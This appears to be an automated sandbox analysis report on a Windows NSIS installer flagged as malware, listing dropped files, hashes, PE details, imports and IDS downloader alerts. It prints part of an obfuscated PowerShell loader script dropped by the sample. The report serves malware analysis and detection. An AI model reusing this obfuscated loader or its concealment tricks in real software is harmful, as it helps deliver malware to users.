Reputation:	high, very likely benign file
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_m5pduyxv.rdl.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	high, very likely benign file
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ri1consq.pmf.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xziqauov.5ne.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis\Latin\Atomspaltningens.Cyr

Download File

Process:	C:\Users\user\Desktop\ugpJX5h56S.exe
File Type:	data
Category:	dropped
Size (bytes):	319261
Entropy (8bit):	7.717192767320921
Encrypted:	false
SSDEEP:	6144:9BPRrL/Cxum9LMq1tbeGjiK6FusctdXoFU7BbF:r5PaxHP1UG+K8ctdoFAF
MD5:	00116A8867133361D82DAB78EFD3DD11
SHA1:	0B1B99E68B4CFE645EFD572C0A5349300C66B97D
SHA-256:	AB17986BA2E44D3BA81C4292D61FAEB45C3CE115B0ADD9CC31BAB90894008F70
SHA-512:	E3066613E90B922E12727C3B8A6DE75F3F9FABEEBA6383154409B3309FDC7AABA287B9042B4C3C6A200F9AC9C1B7D880DB347793035B387A7196E386F29A78CB
Malicious:	false
Preview:	......<.......%.....ii.................=............WW......P...ii.......\\\....GGG.8.............?.....OO.......F...............................c.k..l.................www..S...u.22......................B..........................K..,.....}}.PPP.........`..........r..........V.Q..................\|\|.8.........bb...J.)))......iiii.... ...........t....}..------.YYYYY.............t.......\|\|\|....A..................X..H.....BBBB..{{{.....66...%..))........T....H..q...--.=.{.......Z.......2...................................................................}................................@@....................___.................................^..........R.............[[[.........J...............*..o....................................00.....................II..ii.....pp................................................D...&..........qqq....~~...........E...................0.pp..............xxx.....q....................>.a........GGG............]...-.TTTTTT..........7.....&&&............

C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis\Latin\Ectomeric252.Cui

Download File

Process:	C:\Users\user\Desktop\ugpJX5h56S.exe
File Type:	Unicode text, UTF-8 text, with very long lines (4071), with CRLF, LF line terminators
Category:	dropped
Size (bytes):	71172
Entropy (8bit):	5.182231303231486
Encrypted:	false
SSDEEP:	1536:GnpDFaOg5eu8Yc+SFZByu1526yJzm5ZXJpBoaNWnykKSB:UppaOgeZYUBHdoO9t/Nm7xB
MD5:	2D96096979C54A49A5C74AFE1655419D
SHA1:	4926CA53389F5D7A3A80CF209A09836816B93630
SHA-256:	6D67CDA6F0974488147C1C37A76AFA0699AD1C1DBA4ACABC2EC4CABA4EBC8C9E
SHA-512:	65567F063DC5CB5956DAB8050F547E6CD9F186B262AA3392D867370CFA806BDCCC4301DFB1268F278A23986B9BEDA8377886E18606735BD6BC7F319F5378D26D
Malicious:	false
Preview:	$Mediumise=$founderingutorisationsordningerne;.....<#Semicapitalistic Revisal Programhoveders Jacquemart Colocolo Ligningslovene Plastery #>..<#Nataka Straffefangernes Banepakkernes Overweighing Saluting #>..<#Syndet Legemsbygningers Ddsstund Marehalmens Freddie Disintegreredes #>..<#Chablisers Bombardman Underskridendes Brugerprogrammerne Bryales Cifferflge Vidnes #>..<#Enajim Landless Phytophagic Remedierne Paladiner Macropyramid Tiaraer #>..<#Forhandlingspartnere Jedding banghed Snuptagslsning telfonmontrer #>...$Amazonerne = @'.Aspired.Maarhaa$IndtgtsPShtetlatRhodalie Nedk,lrStrikkeiAfraidsd mpyreaoO erdrasRefo mapGovern.eParsonsr RegnskmUnr movaAleutitePene.op=Sdek rn$A,ylophRStaaltre Stemn.tSemicatn Haly riSlettefnProficigJugerinsBundgaraTelek mn,aninert Pingvie Bevistnran stanUnmigraeMono et;Applice. Retsm.freevo euV gilannFlottescRomanist Licen,iLuksus oCephalonThirl g sevrd,gNOidiakuo BernasnPersonisDeklareeTodkkercCaricaauU brackr,alonkoiSteakentCaupos,iNdtvungeForskyds.pide

C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis\Latin\Neonlysskilt.txt

Download File

Process:	C:\Users\user\Desktop\ugpJX5h56S.exe
File Type:	ASCII text, with very long lines (338), with no line terminators
Category:	dropped
Size (bytes):	338
Entropy (8bit):	4.307059828439222
Encrypted:	false
SSDEEP:	6:wXW0N+ueXy8QT/DLlbCqbtidDt4jHID5GXsW/uyiNXSgP/CAjTOB+M9E+n:wXW0GXK/XlTbtq5Nt6/u3HCA2B+M9E+n
MD5:	465F76EC7C2B514001DF749A302E6BFB
SHA1:	F00C03E1DAC98A5F44C3920E49D73535945F5188
SHA-256:	63B00F84026BA825D47D2185D7CD819AD9059DAC82BDBC30AD133ECB05327E7F
SHA-512:	E72609AA7C0B54E17A0ABC784CF599ACBA2149B232880F9F25D08E2326F295DFB7607EC9CB1922B547F9495FE4ED25D4A4B1F2724D8EDA1A234F7EB2CC5235FC
Malicious:	false
Preview:	jgt pensionrerne overhands hedley helmuths offensives.vgtklasses countercharged hideaways.kassandras courtiership organics ejectum gaffeltrucket,toothachy fellowlike hesiometre stripfilm kuldslaaendes,overenskomstresultaternes stitrernes konfessionen mandhaftig.communiqu fuldtidsbeskftigelsen bnkebiderne stberiers hors beached pallette,

C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis\Latin\Teet173.net

Download File

Process:	C:\Users\user\Desktop\ugpJX5h56S.exe
File Type:	data
Category:	dropped
Size (bytes):	454486
Entropy (8bit):	1.2524987371551821
Encrypted:	false
SSDEEP:	1536:v0ynJn+FyRFgfJzXCCuWE44ok+4FoPtBNuNi:v0ynJtFgfJW544oeWH
MD5:	F4323CDDCA33656C45D3017DBB494458
SHA1:	6B9284C25151843B71F790399CBAE4BD17109871
SHA-256:	B5F229D8FCD6FE20FCED25B4714776C43CD2A7BEBDB1DEA828626A9053B0D83D
SHA-512:	A3CC6B0945806B795724A708128F632682FF608081099CC7BFD9E6DF2C0C9BBE7D47C15178C9065BF5E24020DF0E74EE5BF3ED52BA7CE570E7D7AC30590271A3
Malicious:	false
Preview:	........................!.A......v................................ ................e...........X............................Y............>..........5..O"..........................................N.....4..............t.....................................................................2..................b.........%...........q.....................[......7...............>....................................................................................O...................................<................................Z....................................#.....................................................I.........`....................................V................................,.......................................;........................................................Q........................................P.............................d=...............\..................................................8.............................,..........B........................

C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis\Latin\Underfaldshjulet\udplacder.keg

Download File

Process:	C:\Users\user\Desktop\ugpJX5h56S.exe
File Type:	data
Category:	dropped
Size (bytes):	499232
Entropy (8bit):	1.256116885413473
Encrypted:	false
SSDEEP:	1536:F8NKKWFbUGe3N39maaBQhaN15GaLL63n4BlYQi/SZmoN79frhS6qGSi:F8N7oUnNmN7hy3n4BlYLKLlMG5
MD5:	C458F59BAFFABE11D1AD37909B3C7079
SHA1:	C94C42A1AB8ABB09507280B380CAD2A920C2AE93
SHA-256:	7073DC7C9F5942B9D5FA2D6E24CEA3D4CE6BA93176DD090EF5A5A6796BCD8DA5
SHA-512:	34CB8B88371DE84C270CEB88B6A22F325278A9AC211E813562263E8C299DA6F76E2B205D0FDF6E7B0ED033EE10B0717F89AADA4EEC3E3D80C1B9AEC89D340F71
Malicious:	false
Preview:	............................................................{........%......[........................................0..............................................{...B.....................;......................i.................................................#.............................s.................................................4.....8.........S.............................................................................p......................................j.....H....................n......................\.........................................................j................................>................................0...........?............................................-.....7=........................................i..............;..............................................................m..........................t...................................."............................................................................................._........

C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis\Latin\Underfaldshjulet\ugpJX5h56S.exe

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Category:	dropped
Size (bytes):	920112
Entropy (8bit):	7.647174261703857
Encrypted:	false
SSDEEP:	24576:IX22+VsNxAe/3jvPyC2LqE3l8Et2F2Yuri:a2exAOyTv3uEtUW
MD5:	D206D2D4CC4961ACE139AC7EB8C4F305
SHA1:	72555790CE99624754007F0DE9F8757FA4C4F488
SHA-256:	CF28AF37882FEA56145883BEE9A128CB31B51C07D449B49E3071499B5F6F70EA
SHA-512:	599DA72384D2799FA6D33F3DDDD621373AF0CBE956F99B811C42D6BE1DFE16BE4BB4C183640B40384B9AABAE4F793BA4FD6D1F46C6EF22C24DB4D91BAAD960F1
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 42%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1 ..PN..PN..PN._...PN..PO.JPN._...PN.s~..PN..VH..PN.Rich.PN.........................PE..L....C.f.................f...".......5............@..................................^....@..............................................z...........................................................................................................text...ve.......f.................. ..`.rdata..X............j..............@..@.data...8............~..............@....ndata...................................rsrc....z.......\|..................@..@................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis\Latin\Underfaldshjulet\ugpJX5h56S.exe:Zone.Identifier

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis\Latin\bibliotekskaldene.meg

Download File

Process:	C:\Users\user\Desktop\ugpJX5h56S.exe
File Type:	data
Category:	dropped
Size (bytes):	409946
Entropy (8bit):	1.2535737381103589
Encrypted:	false
SSDEEP:	1536:3pKI3cbwZj87HWgWRQy56IrWKlUHAGqheijKK:738u5rCAThz
MD5:	4FF250D172D6AA46629B269AC732435B
SHA1:	221C813C3C21A049AAC6E1625D128153743BD0BB
SHA-256:	F6E5E9B0245658FF93C7335D7FDD1AA4ED097FFD0D48ABCB23D07A11D49E3040
SHA-512:	5456EA2C0FF252FC830670C5293B24D555C0728F3ECD25E3485E656176FFD039C14ACCE93402816FB96A36B19A836D2A84E9429A2D04745BDE9D011CB91189B7
Malicious:	false
Preview:	.8....L...........a..E...........................T................................................W.....j...............................i...............................qB....................B........................................D.................=................................................j...................:..................................../...G..............................................................................8..................................................M........m..................................>...............>...........................................................-......................................u..............._.......7...........................=.........]....................................................................................................................................k................;..............................................p...................................~\....................m..........................P...

C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis\Latin\nedlaeggelse.eva

Download File

Process:	C:\Users\user\Desktop\ugpJX5h56S.exe
File Type:	Matlab v4 mat-file (little endian) , numeric, rows 0, columns 0
Category:	dropped
Size (bytes):	377855
Entropy (8bit):	1.2480133053641047
Encrypted:	false
SSDEEP:	768:T3j4B9Djpmub8VeOfAGor4RPrbZq9IFK9OTwdiY6d7Cl9v/sqiXIaIgIo4Vcrn/S:29P9dWwwPEofIxXG5DHJ/v/X
MD5:	04F33F90D56994EC3DCDFC7981DC9AA0
SHA1:	E1B39BD71B685C3EC9A0DD1F63521D019BD6A126
SHA-256:	066EFC37F0302018EE5F4FE71649E62F64DD2310D2A8D00306A357DD0BD43C36
SHA-512:	80263A59D97ED83826172858DD1230DAF55BDCFA3B583B29B0A2FD2349BCB8E8EC14E820A4F16D1D0BAEBE8AB243514A22CCD29C4397BF28BA5EC36D40456DBE
Malicious:	false
Preview:	.............................z...................M............n..............m..................................S.....9.W.................................^........^....................~.................o..................... ......................... .............................................................................................................................................N.................i.................w....................t.............................................^........Z................=.....................................iD..............................................................6...................................................................q......................Q........k...........,........r............>...............'..+....................................................o..........J......s.................................................................................................x......N.............................................

C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis\Latin\tretrinsraket.rik

Download File

Process:	C:\Users\user\Desktop\ugpJX5h56S.exe
File Type:	data
Category:	dropped
Size (bytes):	494972
Entropy (8bit):	1.2524594051710012
Encrypted:	false
SSDEEP:	1536:9ceAUHe6nPz1UkcBT5P7p3mq/1Ie5GkgjKjz:Rve6n4z7pRueo5K
MD5:	539CFE2727A7650AF877C317CD317A90
SHA1:	64F6F5F6EE89755BA75942B746529BC879817613
SHA-256:	AE12461B71485C805DB15AAA75B5F70C957EBF40678D65CB6D3EF497F67AAFE3
SHA-512:	5A54A7EBEEA0DDD0E0CE16ED2DB2C16C39777C663075A0C5CCF5C1D313E9F760B61DA06B330AD5CA228CA92716192B52D07D03F96ED695CD28DDFE36EB65FE85
Malicious:	false
Preview:	..............................].....................................................................................................................t~...............................'............j................<....u.................Q.......................................................................u...............(.......................................................................................................................k.................................m...8...........................................................s.................................S....6.........y.........X.....Y.......................!.......... ................................................................................................?................9.........................."......Y....................t.....................................................................J....B.............................................................s.....................................................

C:\Windows\huzzah.lnk

Download File

Process:	C:\Users\user\Desktop\ugpJX5h56S.exe
File Type:	MS Windows shortcut, Item id list present, Has Relative path, Has Working directory, ctime=Sun Dec 31 23:25:52 1600, mtime=Sun Dec 31 23:25:52 1600, atime=Sun Dec 31 23:25:52 1600, length=0, window=hide
Category:	dropped
Size (bytes):	834
Entropy (8bit):	3.3618433311830147
Encrypted:	false
SSDEEP:	12:8wl0ZRm/3BVkUnDypCucpANRDucLAWJMJ7ScEUm1bfl8TMK9/TL6CNbw4t2YZ/eJ:8NU/BTDICucmDuIeMcOSTMK02bIqy
MD5:	24562688587D753F87D9A47AD9417ABE
SHA1:	7AA3FFF580A58C2041FEB2624DB11394439B757E
SHA-256:	2AFAD577C6C376DA9C4D3DA7758E3AB9BC41BCFF586DB597B2B1986F91DB3F18
SHA-512:	0B298BA5ADC8637EC698558DBB17AC9151C972BC660C9098ED34F08AE88ADAC59418234DAD2B0C8C8D9A8E95B3CCFB04B6A20418C5470A82565EE955499F9541
Malicious:	false
Preview:	L..................F........................................................I....P.O. .:i.....+00.../C:\...................V.1...........Windows.@............................................W.i.n.d.o.w.s.....P.1...........Fonts.<............................................F.o.n.t.s.....t.2...........tegnskriftens.esk.T............................................t.e.g.n.s.k.r.i.f.t.e.n.s...e.s.k... .......\.F.o.n.t.s.\.t.e.g.n.s.k.r.i.f.t.e.n.s...e.s.k.V.C.:.\.U.s.e.r.s.\.a.l.f.o.n.s.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.i.n.t.e.r.p.e.l.l.a.n.t.\.s.t.i.m.u.l.e.r.e.\.C.h.e.m.o.s.i.s.\.L.a.t.i.n.\.U.n.d.e.r.f.a.l.d.s.h.j.u.l.e.t.........$..................C..B..g..(.#................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.2.2.4.6.1.2.2.6.5.8.-.3.6.9.3.4.0.5.1.1.7.-.2.4.7.6.7.5.6.6.3.4.-.1.0.0.3.................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit):	7.647174261703857
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	ugpJX5h56S.exe
File size:	920'112 bytes
MD5:	d206d2d4cc4961ace139ac7eb8c4f305
SHA1:	72555790ce99624754007f0de9f8757fa4c4f488
SHA256:	cf28af37882fea56145883bee9a128cb31b51c07d449b49e3071499b5f6f70ea
SHA512:	599da72384d2799fa6d33f3dddd621373af0cbe956f99b811c42d6be1dfe16be4bb4c183640b40384b9aabae4f793ba4fd6d1f46c6ef22c24db4d91baad960f1
SSDEEP:	24576:IX22+VsNxAe/3jvPyC2LqE3l8Et2F2Yuri:a2exAOyTv3uEtUW
TLSH:	EF1512457B17ED72F76342309C6AD94A4A64FE39220CB3EE2B74FBBB6532254081F611
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1 ..PN..PN..PN._...PN..PO.JPN._...PN..s~..PN..VH..PN.Rich.PN.........................PE..L....C.f.................f...".....

File Icon


Icon Hash:	8ad03039793b8f46

Static PE Info

General

Entrypoint:	0x40351c
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x660843F3 [Sat Mar 30 16:55:15 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f4639a0b3116c2cfc71144b88a929cfd

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=Pervasiveness, O=Pervasiveness, L=Columbus, C=US
Signature Validation Error:	A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
Error Number:	-2146762487
Not Before, Not After	26/09/2024 06:42:04 26/09/2027 06:42:04
Subject Chain	CN=Pervasiveness, O=Pervasiveness, L=Columbus, C=US
Version:	3
Thumbprint MD5:	CD47D587848A81FAFB61FB2AD8E6E1AD
Thumbprint SHA-1:	2023FB4EA3946D861F7505FD549CE3167E3F781B
Thumbprint SHA-256:	7B7D3B401B370C9EF0FE765B7EB0891733286A8F309DFE41475D5C18D8F8187D
Serial:	6D092D62DF9869ACDBA2D25F9138DB937FDFCFFC

Entrypoint Preview

Instruction
sub esp, 000003F8h
push ebp
push esi
push edi
push 00000020h
pop edi
xor ebp, ebp
push 00008001h
mov dword ptr [esp+20h], ebp
mov dword ptr [esp+18h], 0040A2D8h
mov dword ptr [esp+14h], ebp
call dword ptr [004080A4h]
mov esi, dword ptr [004080A8h]
lea eax, dword ptr [esp+34h]
push eax
mov dword ptr [esp+4Ch], ebp
mov dword ptr [esp+0000014Ch], ebp
mov dword ptr [esp+00000150h], ebp
mov dword ptr [esp+38h], 0000011Ch
call esi
test eax, eax
jne 00007F5DF4F8E07Ah
lea eax, dword ptr [esp+34h]
mov dword ptr [esp+34h], 00000114h
push eax
call esi
mov ax, word ptr [esp+48h]
mov ecx, dword ptr [esp+62h]
sub ax, 00000053h
add ecx, FFFFFFD0h
neg ax
sbb eax, eax
mov byte ptr [esp+0000014Eh], 00000004h
not eax
and eax, ecx
mov word ptr [esp+00000148h], ax
cmp dword ptr [esp+38h], 0Ah
jnc 00007F5DF4F8E048h
and word ptr [esp+42h], 0000h
mov eax, dword ptr [esp+40h]
movzx ecx, byte ptr [esp+3Ch]
mov dword ptr [00429AD8h], eax
xor eax, eax
mov ah, byte ptr [esp+38h]
movzx eax, ax
or eax, ecx
xor ecx, ecx
mov ch, byte ptr [esp+00000148h]
movzx ecx, cx
shl eax, 10h
or eax, ecx
movzx ecx, byte ptr [esp+0000004Eh]

Rich Headers

Programming Language:

[EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x84fc	0xa0	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x58000	0x27ae0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0xe0118	0x918
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8000	0x2a8	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x6576	0x6600	1e4066ed6e7440cc449c401dfd9ca64f	False	0.6663219975490197	data	6.461246686118911	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8000	0x1358	0x1400	f0b500ff912dda10f31f36da3efc8a1e	False	0.44296875	data	5.102094016108248	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xa000	0x1fb38	0x600	2e1d49b2855a89e6218e118f0c182b81	False	0.5026041666666666	data	4.044293204800279	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata	0x2a000	0x2e000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x58000	0x27ae0	0x27c00	44fcccfb09828564447b515fda1781b1	False	0.29796825864779874	data	4.41590745621256	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x58328	0x10828	Device independent bitmap graphic, 128 x 256 x 32, image size 67584	English	United States	0.2519223944161836
RT_ICON	0x68b50	0x94a8	Device independent bitmap graphic, 96 x 192 x 32, image size 38016	English	United States	0.2898885852428001
RT_ICON	0x71ff8	0x5488	Device independent bitmap graphic, 72 x 144 x 32, image size 21600	English	United States	0.34117375231053604
RT_ICON	0x77480	0x4228	Device independent bitmap graphic, 64 x 128 x 32, image size 16896	English	United States	0.36809163911195086
RT_ICON	0x7b6a8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	English	United States	0.42064315352697096
RT_ICON	0x7dc50	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	English	United States	0.48381801125703566
RT_ICON	0x7ecf8	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	English	United States	0.6187943262411347
RT_DIALOG	0x7f160	0x100	data	English	United States	0.5234375
RT_DIALOG	0x7f260	0x11c	data	English	United States	0.6056338028169014
RT_DIALOG	0x7f380	0xc4	data	English	United States	0.5918367346938775
RT_DIALOG	0x7f448	0x60	data	English	United States	0.7291666666666666
RT_GROUP_ICON	0x7f4a8	0x68	data	English	United States	0.7596153846153846
RT_VERSION	0x7f510	0x290	MS Windows COFF PA-RISC object file	English	United States	0.5121951219512195
RT_MANIFEST	0x7f7a0	0x33e	XML 1.0 document, ASCII text, with very long lines (830), with no line terminators	English	United States	0.5542168674698795

Imports

DLL	Import
ADVAPI32.dll	RegEnumValueW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, RegOpenKeyExW, RegCreateKeyExW
SHELL32.dll	SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHFileOperationW, ShellExecuteExW
ole32.dll	CoCreateInstance, OleUninitialize, OleInitialize, IIDFromString, CoTaskMemFree
COMCTL32.dll	ImageList_Destroy, ImageList_AddMasked, ImageList_Create
USER32.dll	MessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, CreatePopupMenu, AppendMenuW, TrackPopupMenu, OpenClipboard, EmptyClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, IsWindowEnabled, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CharPrevW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, CharNextA, wsprintfA, DispatchMessageW, CreateWindowExW, PeekMessageW, GetSystemMetrics
GDI32.dll	GetDeviceCaps, SetBkColor, SelectObject, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor
KERNEL32.dll	lstrcmpiA, CreateFileW, GetTempFileNameW, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersionExW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, WriteFile, CopyFileW, ExitProcess, GetCurrentProcess, GetModuleFileNameW, GetFileSize, GetTickCount, Sleep, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, MulDiv, lstrcpyA, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, SetEnvironmentVariableW

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-17T13:36:06.745483+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.5	49817	172.217.19.174	443	TCP
2024-12-17T13:36:14.717820+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.5	49839	132.226.247.73	80	TCP
2024-12-17T13:36:17.233429+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.5	49839	132.226.247.73	80	TCP
2024-12-17T13:36:18.850206+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.5	49851	172.67.177.134	443	TCP
2024-12-17T13:36:20.327176+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.5	49857	132.226.247.73	80	TCP
2024-12-17T13:36:23.421020+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.5	49864	132.226.247.73	80	TCP
